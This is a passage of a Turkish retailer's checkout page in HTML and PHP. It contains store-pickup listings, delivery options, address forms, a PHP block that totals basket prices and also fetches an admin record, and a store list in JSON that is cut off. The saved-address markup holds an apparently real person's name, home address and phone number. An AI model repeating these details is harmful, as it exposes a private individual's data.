                                            Krc.2022 Yenişehir Mah. Dedepaşa Cad. TR 34000 Yenişehir pendik İstanbul
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b> 0850 433 9311</div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Ist.Vıaport Contaıner Krc.2022" data-store_id="803040">
                                        Mağazayı Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="null"
                                data-store-id="1221335" data-store-fast="0" data-store-state="null">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Ist.Torıum Contaıner Krc.2023</div>
                                        <div class="storeAddress">Ist.Torıum Contaıner Krc.2023 Ist.Torıum Contaıner
                                            Krc.2023 Turgut Özal Mahallesi, Haramidere Yolu TR 34000 Turgut Özal
                                            Esenyurt İstanbul
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b></div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Ist.Torıum Contaıner Krc.2023" data-store_id="1221335">
                                        Mağazayı Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3354"
                                data-store-id="1293569" data-store-fast="0" data-store-state="443">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Ist.Basınekspres Contaıner Krc</div>
                                        <div class="storeAddress">Ist.Basınekspres Contaıner Krc.2021 Ist.Basınekspres
                                            Contaıner Krc.2021 0 Ada 5882 Parsel Halkalı Merkez Mah. TR 34000 Merkez
                                            Küçükçekmece İstanbul
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b></div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Ist.Basınekspres Contaıner Krc" data-store_id="1293569">
                                        Mağazayı Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3383"
                                data-store-id="1589350" data-store-fast="0" data-store-state="757">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Srt.Park Krc.2023</div>
                                        <div class="storeAddress">Srt.Park Krc.2023 Srt.Park Krc.2023 Kooperatif
                                            Mah.Hükümet Cad.No.92 TR 56000 Kooperatif Merkez Siirt
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b></div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Srt.Park Krc.2023" data-store_id="1589350">Mağazayı Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3354"
                                data-store-id="2723564" data-store-fast="0" data-store-state="446">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">IST.PENDORYA CONTAINER KRC.202</div>
                                        <div class="storeAddress">IST.PENDORYA CONTAINER KRC.2024 Çamçeşme Mahallesi, TR
                                            34000 Pendik Pendik İstanbul
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b></div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="IST.PENDORYA CONTAINER KRC.202" data-store_id="2723564">
                                        Mağazayı Seç
                                    </button>
                                </div>
                            </li>
                        </ul>
                    </div>
                </div>
            </div>
        </div>
        <div class="modal fade modal_open_noDeliveryModal" id="noDeliveryModal" tabindex="-1" role="dialog"
             aria-labelledby="modal_noDeliveryModalLabel" aria-hidden="true">
            <div class="modal-dialog modal-md modal-dialog-centered" role="document">
                <div class="modal-content">
                    <div class="modal-header"><span class="modal-title" id="modal_noDeliveryModalLabel"><strong>Mağazadan Teslimat Hakkında</strong></span>
                        <button type="button" class="close modalCloseCustom" data-dismiss="modal" aria-label="Close"><i
                                    class="krc-close-circle"></i></button>
                    </div>
                    <div class="modal-body">
                        <div style="margin: 0 32px">
                            <div> Sepetinizde <b> mağazadan teslimata uygun olmayan </b> ürün(ler) bulunmaktadır.
                                Dilerseniz tüm ürünlerinizi adrese teslim olarak aşağıdaki <b>“Adrese Teslim Devam
                                    Et”</b> butonu ile değiştirebilirsiniz. Mağazadan teslime devam etmek istediğiniz
                                taktirde uygun olmayan ürünler <b> sepetinizden silinecektir. </b></div>
                            <div class="krc-btn krc-btn-full" style="margin-top: 40px">Adrese Teslim İlerle</div>
                            <div class="krc-btn" style="border: 1px solid #979797; margin-top: 20px">Mağazadan Teslim
                                İlerle
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="basketContent">
            <div class="container">
                <div class="row">
                    <div class="col-sm-12 col-lg-8 left">
                        <div id="deliveryWrap" class="deliveryWrap">
                            <div class="delivery-options-tab-container">
                                <div class="delivery-options-tab-header"><b>Teslimat Seçenekleri</b></div>
                                <ul id="tabs" class="nav nav-tabs krc-tabs" role="tablist">
                                    <li data-tab_status="standart" data-type_status="1"
                                        class="nav-item delivery-options-tab-left krc-tab-btn active"><a
                                                href="javascript:void(0)" data-delivery_type="standart"
                                                class="delivery-link delivery-type-selected" data-toggle="tab"
                                                role="tab" aria-selected="false">
                                            <div class="delivery-options-circle">
                                                <div class="delivery-options-circle-inside"></div>
                                            </div>
                                            <div class="delivery-options-desc">
                                                <div class="delivery-options-header">Adrese Teslimat</div>
                                                <div class="delivery-options-gray">Adrese hızlı teslimat seçenekleri.
                                                </div>
                                            </div>
                                        </a></li>
                                    <li data-tab_status="store" data-type_status="1"
                                        class="nav-item delivery-options-tab-right krc-tab-btn"><a
                                                href="javascript:void(0)"
                                                class="delivery-link delivery-type-selected active"
                                                data-delivery_type="store" data-toggle="tab" role="tab"
                                                aria-selected="true">
                                            <div class="delivery-options-desc-container">
                                                <div class="delivery-options-circle">
                                                    <div class="delivery-options-circle-inside"></div>
                                                </div>
                                                <div class="delivery-options-desc">
                                                    <div class="delivery-options-header">Mağazadan Teslimat</div>
                                                    <div class="delivery-options-gray">
                                                        <div class="store-name-active" style="display: inline;">Mağaza
                                                            Seç
                                                        </div>
                                                        <span style="display:none;" href="javascript:;"
                                                              class="checkout-change-store-delivery"
                                                              data-form_name="checkout_form"
                                                              data-form_type="1">Değiştir</span></div>
                                                </div>
                                            </div>
                                        </a>
                                        <div style="display: block ;"
                                             class="store-delivery-free orderStoreTab-ucretsiz">Ücretsiz
                                        </div>
                                    </li>
                                </ul>
                            </div>
                            <form id="checkout_form" action="" method="post" class="ps20"><input type="hidden"
                                                                                                 name="checkout_invoice_type"
                                                                                                 value="0"><input
                                        type="hidden" name="delivery_type" value="standart"><input type="hidden"
                                                                                                   name="delivery_store_id"
                                                                                                   value="0"><input
                                        type="hidden" name="delivery_store_id_c" value="0"><input type="hidden"
                                                                                                  name="fast_token"
                                                                                                  value="s4d2x5h4t554d2135433z2x2t2x21443y29414e2u4w5p5u5h253q3z223s224t2m5d4l5841354o5x2b2n2n3h4k5a213d264z243s2y2v28413j296"><input
                                        type="hidden" name="shipping_address_id" value=""><input type="hidden"
                                                                                                 name="payment_address_id"
                                                                                                 value=""><input
                                        type="hidden" name="store_address_id" value="21381135"><input type="hidden"
                                                                                                      name="stock_system"
                                                                                                      value="1"><input
                                        type="hidden" name="fast_delivery_checked" value="0"><input type="hidden"
                                                                                                    name="fast_delivery_checked_message"
                                                                                                    value=""><input
                                        type="hidden" name="product_id[]" value="7126611"><input type="hidden"
                                                                                                 name="product_id[]"
                                                                                                 value="7173100"></form>
                            <div class="orderAdsress" style="display: none;">
                                <div class="addressWrap">
                                    <div class="addressBox">
                                        <div class="aBox box-shipping-address" style="">
                                            <div class="abHead">
                                                <div class="text">Teslimat Adresi</div>
                                                <div class="differentBillingAddress checkbox"><input type="checkbox"
                                                                                                     value="0"
                                                                                                     id="differentBillingAddressBox"
                                                                                                     checked=""
                                                                                                     class="checkbox delivery_invoice_selected"><label
                                                            for="differentBillingAddressBox" class="checkboxLabel">
                                                        <div class="differentBillingAddressCheckbox"><i
                                                                    class="krc-okay"></i></div>
                                                        Fatura adresim aynı olsun </label></div>
                                            </div>
                                        </div>
                                        <div class="aBox box-payment-address differentBillingAddressBox"
                                             style="display: none;">
                                            <div class="abHead abHeadFatura">
                                                <div class="text">Fatura Adresi</div>
                                            </div>
                                            <div class="paymentBox address-tab-payment">
                                                <div class="selected-address-name delivery-address-select-header-magazadan-teslimat">
                                                    <b>
                                                        <div class="boxHead">ev</div>
                                                    </b></div>
                                                <div class="second-address-context">
                                                    <div style="display: none;"
                                                         class="delivery-address-select-header delivery-address-select-header-magazadan-teslimat">
                                                        <a href="javascript:void(0);" class="address-form"
                                                           data-address_type="2" data-address_id="0"><img
                                                                    src="/sadece-online-ozel/catalog/view/assets/images/icons/address-plus.svg">
                                                            <div>Yeni Adres Ekle</div>
                                                        </a></div>
                                                    <div class="selected-address-context delivery-address-select-header-magazadan-teslimat">
                                                        <div>ASDADSD SOKAK NO 16 Ayberk CAKİR Bina/Blok No:16 Kat:7
                                                            Daire:3 HİSAR MAH GEMLİK Bursa (552) 251 02 66
                                                        </div>
                                                    </div>
                                                    <div class="selectBox dropdown"><a href="javascript:;" role="button"
                                                                                       id="billingAddress"
                                                                                       class="default-payment-address selected-address-dropdown selected-address-dropdown-magazadan-teslimat"
                                                                                       data-address_type="invoice"
                                                                                       data-default_payment_address="21381135">
                                                            Değiştir <i class="krc-arrow2-bottom"></i></a></div>
                                                </div>
                                            </div>
                                            <div class="address-change-invoice" style="display: none;">
                                                <div class="delivery-address-select-container">
                                                    <div class="delivery-address-select-items-container">
                                                        <div class="delivery-address-select-item address-change-item"
                                                             href="javascript:;" data-address_type="2"
                                                             data-address_id="21381135">
                                                            <div class="delivery-address-select-circle"></div>
                                                            <div>
                                                                <div class="delivery-address-select-name">ev</div>
                                                                <div class="delivery-address-select-content">ASDADSD
                                                                    SOKAK NO 16 Ayberk CAKİR HİSAR MAH GEMLİK Bina/Blok
                                                                    No:16 Kat:7 Daire:3 Bursa (552) 251 02 66
                                                                </div>
                                                            </div>
                                                            <div class="delivery-address-select-threedot-container">
                                                                <div class="delivery-address-select-threedot-item"></div>
                                                                <div class="delivery-address-select-threedot-item"
                                                                     style="margin: 2.25px 0px"></div>
                                                                <div class="delivery-address-select-threedot-item"></div>
                                                            </div>
                                                            <div class="delivery-address-edit-delete">
                                                                <div class="delivery-address-duzenle address-form"
                                                                     data-address_type="2" data-address_id="21381135">
                                                                    <img src="/sadece-online-ozel/catalog/view/assets/images/icons/edit-pen.svg">
                                                                    Düzenle
                                                                </div>
                                                                <div class="delivery-address-sil address-delete-from"
                                                                     data-address_type="2" data-address_id="21381135">
                                                                    <img src="/sadece-online-ozel/catalog/view/assets/images/icons/red-trash.svg">
                                                                    Sil
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="tab-content orderAdsress" role="tablist" style="display: none;">
                                <div id="orderAdsressTab" class="tab-pane active" aria-labelledby="orderAdsressTab">
                                    <div class="fast-shippig-loading text-center" style="display: none;">
                                        <div class="loading-ring">
                                            <div></div>
                                            <div></div>
                                            <div></div>
                                            <div></div>
                                        </div>
                                        <p>Teslimat seçenekleri yükleniyor...</p></div>
                                    <div style="background-color: white; display: none;"
                                         class="deliveryOptions fastShippingOptions">
                                        <div class="doHead" style="display: none;"><b>Ürünlerim</b></div>
                                        <div class="productListNew" style="display: none;"></div>
                                    </div>
                                </div>
                                <div id="orderStoreTab" class="tab-pane" aria-labelledby="orderStoreTab">
                                    <div class="fast-shippig-loading text-center" style="display: none;">
                                        <div class="loading-ring">
                                            <div></div>
                                            <div></div>
                                            <div></div>
                                            <div></div>
                                        </div>
                                        <p>Teslimat seçenekleri yükleniyor...</p></div>
                                    <div class="deliveryOptions storeShippingOptions" style="display: none;">
                                        <div class="doHead"><b>Mağazadan Teslim Edilecek Ürünler </b><span
                                                    class="delivery-adress-pickup-store-free">Ücretsiz</span></div>
                                        <div class="store-products"></div>
                                    </div>
                                </div>
                            </div>
                            <div class="addressDefine"
                                 style="background-color: rgb(255, 255, 255); margin: 24px 0px; display: block;">
                                <div class="addressInputs">
                                    <form id="shippingAddressForm" name="shippingAddressForm" style=""
                                          novalidate="novalidate"><input type="hidden" name="address_id" value=""><input
                                                type="hidden" name="address_type" value="1">
                                        <div class="">
                                            <div class="addressInputHead">Yeni Teslimat Adresi</div>
                                            <div class="form-row">
                                                <div class="form-group is-required col-md-6"><label
                                                            for="inputName2">Ad</label><input type="text"
                                                                                              name="firstname"
                                                                                              class="form-control"
                                                                                              id="inputName2"></div>
                                                <div class="form-group is-required col-md-6"><label for="inputSurname2">Soyad</label><input
                                                            type="text" name="lastname" class="form-control"
                                                            id="inputSurname2"></div>
                                            </div>
                                            <div class="form-row">
                                                <div class="form-group is-required col-lg-6"><label for="telephone2">Telefon</label>
                                                    <div class="inputTelephonePlaceHolder"><input id="inputPhone2" type="text"
                                                                                                  name="telephone"
                                                                                                  autocomplete="new-password"
                                                                                                  class="form-control telephoneMasked"
                                                                                                  value="" required="">
                                                        <div class="telephoneInformationTooltip"><i
                                                                    class="krc-Information"></i>
                                                            <p class="telephoneInformationText"> Telefon numarası <br>
                                                                (555) 555 55 55 <br> formatında olmalıdır! </p></div>
                                                    </div>
                                                </div>
                                                <div class="form-group is-required col-md-6 select"><label
                                                            for="inputCity2">Şehir</label><select id="inputCity2"
                                                                                                  name="zone_id"
                                                                                                  class="form-control krc-select">
                                                        <option selected="" value="">Seçiniz</option>
                                                        <option value="3354">İstanbul</option>
                                                        <option value="3321">Ankara</option>
                                                        <option value="3355">İzmir</option>
                                                        <option value="3315">Adana</option>
                                                        <option value="3316">Adıyaman</option>
                                                        <option value="3317">Afyon</option>
                                                        <option value="3318">Ağrı</option>
                                                        <option value="3319">Aksaray</option>
                                                        <option value="3320">Amasya</option>
                                                        <option value="3321">Ankara</option>
                                                        <option value="3322">Antalya</option>
                                                        <option value="3323">Ardahan</option>
                                                        <option value="3324">Artvin</option>
                                                        <option value="3325">Aydın</option>
                                                        <option value="3326">Balıkesir</option>
                                                        <option value="3327">Bartın</option>
                                                        <option value="3328">Batman</option>
                                                        <option value="3329">Bayburt</option>
                                                        <option value="3330">Bilecik</option>
                                                        <option value="3331">Bingöl</option>
                                                        <option value="3332">Bitlis</option>
                                                        <option value="3333">Bolu</option>
                                                        <option value="3334">Burdur</option>
                                                        <option value="3335">Bursa</option>
                                                        <option value="3336">Çanakkale</option>
                                                        <option value="3337">Çankırı</option>
                                                        <option value="3338">Çorum</option>
                                                        <option value="3339">Denizli</option>
                                                        <option value="3340">Diyarbakır</option>
                                                        <option value="3341">Düzce</option>
                                                        <option value="3342">Edirne</option>
                                                        <option value="3343">Elazığ</option>
                                                        <option value="3344">Erzincan</option>
                                                        <option value="3345">Erzurum</option>
                                                        <option value="3346">Eskişehir</option>
                                                        <option value="3347">Gaziantep</option>
                                                        <option value="3348">Giresun</option>
                                                        <option value="3349">Gümüşhane</option>
                                                        <option value="3350">Hakkari</option>
                                                        <option value="3351">Hatay</option>
                                                        <option value="3372">İçel</option>
                                                        <option value="3352">Iğdır</option>
                                                        <option value="3353">Isparta</option>
                                                        <option value="3354">İstanbul</option>
                                                        <option value="3355">İzmir</option>
                                                        <option value="3356">Kahramanmaraş</option>
                                                        <option value="3357">Karabük</option>
                                                        <option value="3358">Karaman</option>
                                                        <option value="3359">Kars</option>
                                                        <option value="3360">Kastamonu</option>
                                                        <option value="3361">Kayseri</option>
                                                        <option value="3362">Kilis</option>
                                                        <option value="3363">Kırıkkale</option>
                                                        <option value="3364">Kırklareli</option>
                                                        <option value="3365">Kırşehir</option>
                                                        <option value="3366">Kocaeli</option>
                                                        <option value="3367">Konya</option>
                                                        <option value="3368">Kütahya</option>
                                                        <option value="3369">Malatya</option>
                                                        <option value="3370">Manisa</option>
                                                        <option value="3371">Mardin</option>
                                                        <option value="3373">Muğla</option>
                                                        <option value="3374">Muş</option>
                                                        <option value="3375">Nevşehir</option>
                                                        <option value="3376">Niğde</option>
                                                        <option value="3377">Ordu</option>
                                                        <option value="3378">Osmaniye</option>
                                                        <option value="3379">Rize</option>
                                                        <option value="3380">Sakarya</option>
                                                        <option value="3381">Samsun</option>
                                                        <option value="3382">Şanlıurfa</option>
                                                        <option value="3383">Siirt</option>
                                                        <option value="3384">Sinop</option>
                                                        <option value="3385">Şırnak</option>
                                                        <option value="3386">Sivas</option>
                                                        <option value="3387">Tekirdağ</option>
                                                        <option value="3388">Tokat</option>
                                                        <option value="3389">Trabzon</option>
                                                        <option value="3390">Tunceli</option>
                                                        <option value="3391">Uşak</option>
                                                        <option value="3392">Van</option>
                                                        <option value="3393">Yalova</option>
                                                        <option value="3394">Yozgat</option>
                                                        <option value="3395">Zonguldak</option>
                                                    </select></div>
                                            </div>
                                            <div class="form-row">
                                                <div class="form-group is-required col-md-12">
                                                    <label for="inputTown2">İlçe</label>
                                                    <input type="text" name="ilce" class="form-control" id="inputIlce">

                                            </div>
                                            <div class="form-group is-required col-md-12"><label
                                                        for="textareaAddress">Adres</label><textarea
                                                        style="resize: none;" class="form-control" name="address_1"
                                                        id="textareaAddress" rows="3"></textarea></div>
                                            <div class="form-row">
                                                <div class="form-group is-required col-sm-4 col-12"><label
                                                            for="building_number">Bina/Blok No</label><input
                                                            class="form-control" name="building_number"
                                                            id="building_number" type="text" placeholder="Bina No">
                                                </div>
                                                <div class="form-group col-sm-4 col-12"><label for="floor_number">Kat
                                                        No</label><input class="form-control" name="floor_number"
                                                                         id="floor_number" type="text"
                                                                         placeholder="Kat No"></div>
                                                <div class="form-group is-required col-sm-4 col-12"><label
                                                            for="door_number">Daire No</label><input
                                                            class="form-control" id="door_number" name="door_number"
                                                            type="text" placeholder="Daire No"></div>
                                                <div class="form-group col-sm-12 col-12"><label
                                                            for="address_description">Adres Tarifi</label><textarea
                                                            class="form-control" name="address_description"
                                                            id="address_description" rows="{5}"></textarea></div>
                                            </div>
                                            <div class="form-row">
                                                <div class="form-group col-md-6"><label for="postcode">Posta
                                                        Kodu</label><input type="text" class="form-control"
                                                                           name="postcode" id="postcode"></div>
                                                <div class="form-group is-required col-md-6"><label
                                                            for="inputAddressName">Adres Başlığı</label><input
                                                            type="text" class="form-control" name="name"
                                                            id="inputAddressName"></div>
                                            </div>
                                        </div>
                                        <div class="addressBtns">
                                            <button class="krc-btn krc-btn-full btn-checkout-next">Devam Et</button>
                                        </div>
                                    </form>
                                    <form id="paymentAddressForm" name="paymentAddressForm" style="display: none;"
                                          novalidate="novalidate"><input type="hidden" name="address_id" value=""><input
                                                type="hidden" name="address_type" value="2">
                                        <div class="">
                                            <div class="addressInputHead">Yeni Fatura Adresi</div>
                                            <div class="form-row">
                                                <div class="form-group is-required col-md-6"><label
                                                            for="inputName3">Ad</label><input type="text"
                                                                                              name="firstname"
                                                                                              class="form-control"
                                                                                              id="inputName3"></div>
                                                <div class="form-group is-required col-md-6"><label for="inputSurname3">Soyad</label><input
                                                            type="text" name="lastname" class="form-control"
                                                            id="inputSurname3"></div>
                                            </div>
                                            <div class="form-row">
                                                <div class="form-group is-required col-lg-6"><label for="telephone3">Telefon</label>
                                                    <div class="inputTelephonePlaceHolder"><input type="text"
                                                                                                  name="telephone"
                                                                                                  autocomplete="new-password"
                                                                                                  class="form-control telephoneMasked"
                                                                                                  value="" required="">
                                                        <div class="telephoneInformationTooltip"><i
                                                                    class="krc-Information"></i>
                                                            <p class="telephoneInformationText"> Telefon numarası <br>
                                                                (555) 555 55 55 <br> formatında olmalıdır! </p></div>
                                                    </div>
                                                </div>
                                                <div class="form-group is-required col-md-6"><label for="inputCity3">Şehir</label><select
                                                            name="zone_id" class="form-control krc-select">
                                                        <option selected="" value="">Seçiniz</option>
                                                        <option value="3315">Adana</option>
                                                        <option value="3316">Adıyaman</option>
                                                        <option value="3317">Afyon</option>
                                                        <option value="3318">Ağrı</option>
                                                        <option value="3319">Aksaray</option>
                                                        <option value="3320">Amasya</option>
                                                        <option value="3321">Ankara</option>
                                                        <option value="3322">Antalya</option>
                                                        <option value="3323">Ardahan</option>
                                                        <option value="3324">Artvin</option>
                                                        <option value="3325">Aydın</option>
                                                        <option value="3326">Balıkesir</option>
                                                        <option value="3327">Bartın</option>
                                                        <option value="3328">Batman</option>
                                                        <option value="3329">Bayburt</option>
                                                        <option value="3330">Bilecik</option>
                                                        <option value="3331">Bingöl</option>
                                                        <option value="3332">Bitlis</option>
                                                        <option value="3333">Bolu</option>
                                                        <option value="3334">Burdur</option>
                                                        <option value="3335">Bursa</option>
                                                        <option value="3336">Çanakkale</option>
                                                        <option value="3337">Çankırı</option>
                                                        <option value="3338">Çorum</option>
                                                        <option value="3339">Denizli</option>
                                                        <option value="3340">Diyarbakır</option>
                                                        <option value="3341">Düzce</option>
                                                        <option value="3342">Edirne</option>
                                                        <option value="3343">Elazığ</option>
                                                        <option value="3344">Erzincan</option>
                                                        <option value="3345">Erzurum</option>
                                                        <option value="3346">Eskişehir</option>
                                                        <option value="3347">Gaziantep</option>
                                                        <option value="3348">Giresun</option>
                                                        <option value="3349">Gümüşhane</option>
                                                        <option value="3350">Hakkari</option>
                                                        <option value="3351">Hatay</option>
                                                        <option value="3372">İçel</option>
                                                        <option value="3352">Iğdır</option>
                                                        <option value="3353">Isparta</option>
                                                        <option value="3354">İstanbul</option>
                                                        <option value="3355">İzmir</option>
                                                        <option value="3356">Kahramanmaraş</option>
                                                        <option value="3357">Karabük</option>
                                                        <option value="3358">Karaman</option>
                                                        <option value="3359">Kars</option>
                                                        <option value="3360">Kastamonu</option>
                                                        <option value="3361">Kayseri</option>
                                                        <option value="3362">Kilis</option>
                                                        <option value="3363">Kırıkkale</option>
                                                        <option value="3364">Kırklareli</option>
                                                        <option value="3365">Kırşehir</option>
                                                        <option value="3366">Kocaeli</option>
                                                        <option value="3367">Konya</option>
                                                        <option value="3368">Kütahya</option>
                                                        <option value="3369">Malatya</option>
                                                        <option value="3370">Manisa</option>
                                                        <option value="3371">Mardin</option>
                                                        <option value="3373">Muğla</option>
                                                        <option value="3374">Muş</option>
                                                        <option value="3375">Nevşehir</option>
                                                        <option value="3376">Niğde</option>
                                                        <option value="3377">Ordu</option>
                                                        <option value="3378">Osmaniye</option>
                                                        <option value="3379">Rize</option>
                                                        <option value="3380">Sakarya</option>
                                                        <option value="3381">Samsun</option>
                                                        <option value="3382">Şanlıurfa</option>
                                                        <option value="3383">Siirt</option>
                                                        <option value="3384">Sinop</option>
                                                        <option value="3385">Şırnak</option>
                                                        <option value="3386">Sivas</option>
                                                        <option value="3387">Tekirdağ</option>
                                                        <option value="3388">Tokat</option>
                                                        <option value="3389">Trabzon</option>
                                                        <option value="3390">Tunceli</option>
                                                        <option value="3391">Uşak</option>
                                                        <option value="3392">Van</option>
                                                        <option value="3393">Yalova</option>
                                                        <option value="3394">Yozgat</option>
                                                        <option value="3395">Zonguldak</option>
                                                    </select></div>
                                            </div>
                                            <div class="form-row">
                                                <div class="form-group is-required col-md-12">
                                                    <label for="inputTown3">İlçe</label>
                                                    <input type="text" name="ilce" class="form-control" id="inputIlce">
                                                </div>
                                            </div>
                                            <div class="form-group is-required col-md-12"><label
                                                        for="textareaAddress2">Adres</label><textarea
                                                        style="resize: none;" name="address_1" class="form-control"
                                                        id="textareaAddress2" rows="3"></textarea></div>
                                            <div class="form-row">
                                                <div class="form-group is-required col-sm-4 col-12"><label
                                                            for="building_number">Bina/Blok No</label><input
                                                            class="form-control" name="building_number"
                                                            id="building_number" type="text" placeholder="Bina No">
                                                </div>
                                                <div class="form-group col-sm-4 col-12"><label for="floor_number">Kat
                                                        No</label><input class="form-control" name="floor_number"
                                                                         id="floor_number" type="text"
                                                                         placeholder="Kat No"></div>
                                                <div class="form-group is-required col-sm-4 col-12"><label
                                                            for="door_number">Daire No</label><input
                                                            class="form-control" id="door_number" name="door_number"
                                                            type="text" placeholder="Daire No"></div>
                                                <div class="form-group col-sm-12 col-12"><label
                                                            for="address_description">Adres Tarifi</label><textarea
                                                            class="form-control" name="address_description"
                                                            id="address_description" rows="{5}"></textarea></div>
                                            </div>
                                            <div class="form-row">
                                                <div class="form-group col-md-6"><label for="inputAddressNameBilling">Posta
                                                        Kodu</label><input type="text" name="postcode"
                                                                           class="form-control"
                                                                           id="inputAddressNameBilling"></div>
                                                <div class="form-group is-required col-md-6"><label
                                                            for="inputAddressNameBilling">Adres Başlığı</label><input
                                                            type="text" name="name" class="form-control"
                                                            id="inputAddressNameBilling"></div>
                                            </div>
                                        </div>
                                        <div class="addressBtns">
                                            <button type="button" data-form_name="paymentAddressForm"
                                                    class="address-form-clear krc-btn krc-btn-border">Vazgeç
                                            </button>
                                            <button class="krc-btn krc-btn-full btn-checkout-next">Devam Et</button>
                                        </div>
                                    </form>
                                </div>
                            </div>
                        </div>
                    </div>

                </div>
                <?php
                $basket = $_SESSION['basket'] ?? [];

                $sql = "SELECT * FROM products WHERE id = :id";
                $stmt = $db->prepare($sql);
                $stmt->execute(['id' => $product['product_id']]);
                $product = $stmt->fetch(PDO::FETCH_OBJ);
                $admin = $db->query('SELECT * FROM admins WHERE id = 1')->fetch(PDO::FETCH_OBJ);

                $toplamFiyat = 0;
                foreach ($basket as $productItem) {
                    $sql = "SELECT * FROM products WHERE id = :id";
                    $stmt = $db->prepare($sql);
                    $stmt->execute(['id' => $productItem['product_id']]);
                    $product = $stmt->fetch(PDO::FETCH_OBJ);
                    if ($product) {
                        $toplamFiyat += $product->ProductPrice;
                    }
                }
                $totalPrice = $toplamFiyat;

                ?>
                <div class="col-sm-12 col-lg-4 d-none d-sm-block right">
                    <div class="orderSummary deliveryOrderSummery">
                        <div class="makemesticky">
                            <div class="head d-none d-sm-block"><span>Sipariş Özeti</span></div>
                            <div class="summaryInfo d-none d-sm-block">
                                <div class="line summary-detail__wrapper" id="sub_total" data-sub-total="<?= $totalPrice; ?> TL">
                                    <span class="summary-detail__label">Ara Toplam</span>
                                    <span class="summary-detail__price"><?= number_format($totalPrice, 2); ?> TL</span>
                                </div>
                                <div class="line summary-detail__wrapper success" id="shipping" data-shipping="0">
                                    <span class="summary-detail__label">Ücretsiz Kargo</span>
                                    <span class="summary-detail__price" style="color:#05b71d;">0.00 TL</span>
                                </div>
                                <div class="line summary-detail__wrapper" id="total" data-total="<?= $totalPrice; ?> TL">
                                    <span class="summary-detail__label">Toplam</span>
                                    <span class="summary-detail__price"><?= number_format($totalPrice, 2); ?> TL</span>
                                </div>
                            </div>
                            <div class="orderNextStep">
                                <button id="odemeyap" type="button" class="btn-checkout-next krc-btn krc-btn-full">Devam Et</button>
                            </div>
                        </div>
                    </div>
                </div>

            </div>
        </div>
        <div class="summaryMain d-block d-sm-none">
            <div style="padding: 13px 16px; font-size: 18px" class="font-weight-bold">Sipariş Özeti</div>
            <div class="summary-detail">
                <div class="line summary-detail__wrapper " id="sub_total" data-sub-total="12497"><span
                            class="summary-detail__label">Ara Toplam</span><span
                            class="summary-detail__price"><?= number_format($totalPrice, 2); ?> TL</span></div>
                <div class="line summary-detail__wrapper success" id="shipping" data-shipping="0"><span
                            class="summary-detail__label">Ücretsiz Kargo</span><span class="summary-detail__price"
                                                                                     style="color:#05b71d;">0.00 TL</span>
                </div>
                <div class="line summary-detail__wrapper " id="total" data-total="12497"><span
                            class="summary-detail__label">Toplam</span><span
                            class="summary-detail__price"><?= number_format($totalPrice, 2); ?> TL</span></div>
            </div>
        </div>
        <div class="sticky-summary d-flex d-sm-none">
            <div class="price">
                <div class="right text-left"><span>Toplam</span>
                    <div class="price-merge"><strong id="cart-total-mobil"><?= number_format($totalPrice, 2); ?> TL</strong></div>
                </div>
            </div>
            <div class="button btn-checkout-next"><a type="button" class="btn-checkout-next krc-btn krc-btn-full">Devam Et</a></div>
        </div>
        <script>
            var invoiceAddressCount = 1;
            var shippingAddressCount = 0;
        </script>
        <script>
            let deliveryStoreSelected = 0;
            let deliveryStoreList = [{
                "id": 41,
                "name": "Bolu Burda Avm Magazası",
                "address": "Blu.Burda Krc.2015 Bolu Burda Avm Magazası 14 Burda Alışveriş Merkezi Paşaköy Mah.   TR 14000 Paşaköy Merkez Bolu",
                "cityId": 3333,
                "city": "Bolu",
                "state": "Merkez",
                "stateId": 176,
                "phone": "0850 432 9791",
                "lat": "40.7557",
                "lng": "35.8583",
                "inventLocation": "2077",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 50,
                "name": "Çanakkale Forum Avm Magazası",
                "address": "Ckk.Forum Krc.2015 Çanakkale Forum Avm Magazası 17 Burda Alışveriş Merkezi Barbaros Mah.   TR 17000 Barbaros Merkez Çanakkale",
                "cityId": 3336,
                "city": "Çanakkale",
                "state": "Merkez",
                "stateId": 220,
                "phone": "0850 432 9785",
                "lat": "40.1247",
                "lng": "26.4109",
                "inventLocation": "2071",
                "sameDayDelivery": false,
                "deadlineTime": "1-4 Gün",
                "deadlineText": "1-4 gün içerisinde mağazadan teslim alabilirsiniz "
            }, {
                "id": 51,
                "name": "Çorum Ahlpark Avm Magazası",
                "address": "Cor.Ahlpark Krc.2016 Çorum Ahlpark Avm Magazası Çorum Ahl Park Alışveriş Merkezi   TR 19000 Çepni Merkez Çorum",
                "cityId": 3338,
                "city": "Çorum",
                "state": "Merkez",
                "stateId": 241,
